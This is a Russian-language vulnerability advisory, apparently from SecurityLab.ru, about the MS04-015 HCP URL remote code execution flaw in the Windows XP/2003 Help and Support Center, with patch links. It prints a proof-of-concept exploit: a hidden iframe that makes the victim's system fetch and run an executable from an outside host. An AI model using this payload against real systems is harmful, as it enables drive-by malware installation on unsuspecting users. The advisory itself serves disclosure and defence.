Уязвимости

Удаленное выполнение произвольного кода в Help and Support Center в Windows XP/2003

Дата публикации:12.05.2004
Всего просмотров: 1728
Опасность: Высокая
Наличие исправления: Да
Количество уязвимостей: 1
CVSSv2 рейтинг:
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита:
Уязвимые продукты: Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Web Edition

Уязвимые версии: Windows XP/2003

Описание: Уязвимость обнаружена в Help and Support Center в обработке HCP URL. Удаленный атакующий может скомпрометировать уязвимую систему.

Удаленный атакующий может сконструировать специально обработанный HCP URL, который выполнит произвольный код в браузере пользователя, посетившего злонамеренный Web сайт или просмотревшего злонамеренное email сообщение.

Пример/Эксплоит: 

<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvd
upgd/dvdupgd.exe"
width="1" height="1">
</iframe>

URL производителя:http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx

Решение:Установите соответствующее обновление:

1. Windows XP: http://www.microsoft.com/downloads/details.aspx?FamilyId=563F65A3-D793-47B4-A607-948CAA5B3454&displaylang=en

2. Windows 2003 http://www.microsoft.com/downloads/details.aspx?FamilyId=50AD42D7-81BD-4F96-9AD1-0E67310551DF&displaylang=en

Ссылки:
MS04-015 - Windows Help Center - Dvdupgrade


 Ежедневный выпуск от SecurityLab.Ru
 Еженедельный выпуск от SecurityLab.Ru

Ваше имя:
Тип обращения:
Смайлики
Широкая улыбка  Скептически  Идея 
Вопрос  Восклицание  Шутливо 
Со злостью  Очень грустно  Смущенно 
Поцелуй  Здорово  Удивленно 
Печально  С улыбкой  sensored 
Защита от автоматических сообщений:
Защита от автоматических сообщений
Символы на картинке:

                                                                                                                                                                                                                                               

Блоги
22.05.2013
Колода без козырей
Тут в определённых кругах зреет мысль, что так называемые подразделения "К" МВД (т.е. по преступлени...
22.05.2013
CARO'2013 by ESET
Каждый год конференцию CARO организует одна из антивирусных компаний в разных уголках Европы. Мне уж...
22.05.2013
Опубликован 21 приказ ФСТЭК
Приказ Федеральной службы по техническому и экспортному контролю (ФСТЭК России) от 18 февраля 2013 г...
22.05.2013
Вопросы с 601 по 631 из CISM (перевод)
Это последняя часть перевода.

601. Административный пароль на БД, содержащую конфиденциаль...
22.05.2013
Риск-ориентированность в защите ПДн
Свершилось !


21-ый приказ ФСТЭК зарегистрирован и официально опубликован:


...
22.05.2013
Какие мобильные устройства и приложения нужны американскому солдату?
Серьезное регулирование области информационной безопасности существует далеко не во всех стран...
21.05.2013
Мой доклад на PHDays 24 мая в 16 часов
Согласно опубликованному сегодня списку докладов мой доклад состоится 24 мая в 16 часов в зале "Урал...
21.05.2013
Досадный баг ВКонтакте
С недавних пор (около года назад), социальная сеть ВКонтакте в агрессивно принудительной форме ст...
21.05.2013
Отрезанный ломоть
В беседе с коллегами был высказан аргумент, которого очень не хватало для обоснования той странной п...
21.05.2013
Vista Equity Partners покупает Websense
20-го мая инвестиционный фонд Vista Equity Partners объявило намерении приобрести известную и в Росс...